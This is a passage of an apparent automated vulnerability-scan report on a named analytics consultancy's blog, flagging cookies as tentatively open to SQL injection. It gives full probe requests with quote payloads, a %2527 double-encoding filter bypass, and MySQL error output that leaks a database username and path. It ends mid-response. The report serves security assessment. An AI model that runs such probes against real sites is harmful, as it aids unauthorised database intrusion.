Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:58:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html?itemid=70#comment%00'' HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=30
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:58:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.34. http://www.analyticspros.com/blog/55-googleanalytics/68-unobfuscate-gajs-file.html [__utmmobile cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/68-unobfuscate-gajs-file.html

Issue detail

The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics/68-unobfuscate-gajs-file.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c';

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:07:38 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/68-unobfuscate-gajs-file.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c'';

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:07:40 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:07:41 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:07:41 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21212


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.35. http://www.analyticspros.com/blog/55-googleanalytics/68-unobfuscate-gajs-file.html [ki_t cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/68-unobfuscate-gajs-file.html

Issue detail

The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics/68-unobfuscate-gajs-file.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11'; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:58:04 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/68-unobfuscate-gajs-file.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11''; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:58:06 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.36. http://www.analyticspros.com/blog/55-googleanalytics/77-refresh-rate-content-metric.html [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/77-refresh-rate-content-metric.html

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utma cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/77-refresh-rate-content-metric.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:01:58 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:01:59 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:01:59 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27914


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<h2>Finding the proverbial Needle in the Haystack</h2>
...[SNIP]...

Request 2

GET /blog/55-googleanalytics/77-refresh-rate-content-metric.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527%2527; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:02:00 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.37. http://www.analyticspros.com/blog/55-googleanalytics/77-refresh-rate-content-metric.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/77-refresh-rate-content-metric.html

Issue detail

The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the d4dad6935f632ac35975e3001dc7bbe8 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/77-refresh-rate-content-metric.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=25
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:54:39 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/77-refresh-rate-content-metric.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=25
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:54:40 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.38. http://www.analyticspros.com/blog/55-googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1'; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:59:06 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1''; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:59:07 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.39. http://www.analyticspros.com/blog/55-googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html [fpssCookie cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html

Issue detail

The fpssCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fpssCookie cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the fpssCookie cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true%2527; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:52:43 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true%2527%2527; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:52:44 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:52:48 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:52:48 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21758


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.40. http://www.analyticspros.com/blog/55-googleanalytics/86-google-analytics-intelligence.html [__utmmobile cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/86-google-analytics-intelligence.html

Issue detail

The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmmobile cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/86-google-analytics-intelligence.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c%2527;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:09:51 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/86-google-analytics-intelligence.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c%2527%2527;

Response 2

